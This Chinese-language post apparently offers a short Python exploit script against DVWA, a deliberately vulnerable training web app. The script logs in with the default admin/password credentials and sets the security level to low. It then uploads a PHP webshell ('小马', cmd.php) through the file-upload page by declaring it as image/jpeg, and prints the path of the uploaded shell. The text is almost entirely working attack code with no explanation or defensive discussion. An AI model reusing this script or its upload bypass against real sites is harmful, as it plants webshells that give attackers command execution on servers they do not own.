用法(python3)
针对单个ip
d盘放个小马(D:\cmd.php)
url案例
http://xx.xx.xx.xx:9090
exp
import requests
import re
url = input("请输入[http://127.0.0.1:8080]:"+'\n')
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Connection':'keep-alive',
'Upgrade-Insecure-Requests':'1',}
index_url = url+'/login.php'
index_response = requests.get(url=index_url, headers=headers, timeout=5)
user_token = re.findall(r"name='user_token' value='(.*?)'", index_response.text)[0]
post_data = {
'username': 'admin',
'password': 'password',
'Login': 'Login',
'user_token': user_token,
}
#python 修改cookies
cookie = index_response.cookies
cookies_dict = requests.utils.dict_from_cookiejar(cookie)
cookies_dict['security'] = 'low'
cookies = cookies_dict
respones = requests.post(url=index_url, headers=headers, data=post_data, timeout=5, cookies=cookies)
upload_url = url+'/vulnerabilities/upload/'
upload_response = requests.get(url=upload_url, headers=headers, timeout=5, cookies=cookies)
files={ 'MAX_FILE_SIZE':(None,'100000'),
'uploaded':('cmd.php', open(r'D:\cmd.php', 'rb'), 'image/jpeg'),
'Upload':(None,'Upload'),
'user_token': (None, user_token)
}
r=requests.post(upload_url,files=files,headers=headers, cookies=cookies)
#print(r.text)
#<pre>../../hackable/uploads/cmd.php succesfully uploaded!</pre>
if 'cmd.php' in r.text:
res = re.findall(r'<pre>(.*?)</pre>', r.text)
print("上传成功路径为:", res)
print("-"*100)
else:
print("连接错误")
网友评论